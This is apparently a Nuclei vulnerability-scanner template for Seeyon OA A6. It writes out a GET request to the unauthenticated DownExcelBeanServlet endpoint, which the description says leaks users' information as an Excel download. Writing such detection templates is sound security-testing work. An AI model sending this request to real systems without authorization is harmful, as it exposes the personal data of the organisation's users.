http:
    - matchers:
        - status:
            - 200
          type: status
        - part: header
          type: word
          words:
            - .xls
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0'
id: seeyon-oa-a6-downexcelbeanservlet-infoleak
info:
    author: wangyang
    description: 致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息
    name: 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露
    reference:
        - https://
    severity: medium
    tags:
        - seeyon
        - infoleak
        - Servlet
